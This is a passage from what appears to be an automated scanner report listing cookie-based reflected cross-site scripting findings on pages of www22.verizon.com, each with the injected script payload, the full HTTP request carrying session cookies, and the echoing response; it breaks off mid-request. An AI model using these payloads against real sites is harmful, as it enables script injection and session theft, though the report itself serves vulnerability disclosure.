NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79330
Expires: Sat, 20 Nov 2010 02:57:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX3c7ba<script>alert(1)</script>61b8323e3a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:07 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3C7BA<SCRIPT>ALERT(1)</SCRIPT>61B8323E3A </DIV>
...[SNIP]...

3.283. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7319b'><script>alert(1)</script>b412aee3463 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX7319b'><script>alert(1)</script>b412aee3463; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79336
Expires: Sat, 20 Nov 2010 02:56:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX7319b'><script>alert(1)</script>b412aee3463; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7319B'><SCRIPT>ALERT(1)</SCRIPT>B412AEE3463 ' />
...[SNIP]...

3.284. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 226d7"-alert(1)-"1d917d73025 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=226d7"-alert(1)-"1d917d73025; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 85594
Expires: Sat, 20 Nov 2010 02:56:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "226d7"-alert(1)-"1d917d73025"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

3.285. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af320'><script>alert(1)</script>638530528ed was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXaf320'><script>alert(1)</script>638530528ed; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77956
Expires: Sat, 20 Nov 2010 02:56:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=TXaf320'><script>alert(1)</script>638530528ed; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAF320'><SCRIPT>ALERT(1)</SCRIPT>638530528ED ' />
...[SNIP]...

3.286. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 6357f<script>alert(1)</script>71117283bfe was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX6357f<script>alert(1)</script>71117283bfe; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; 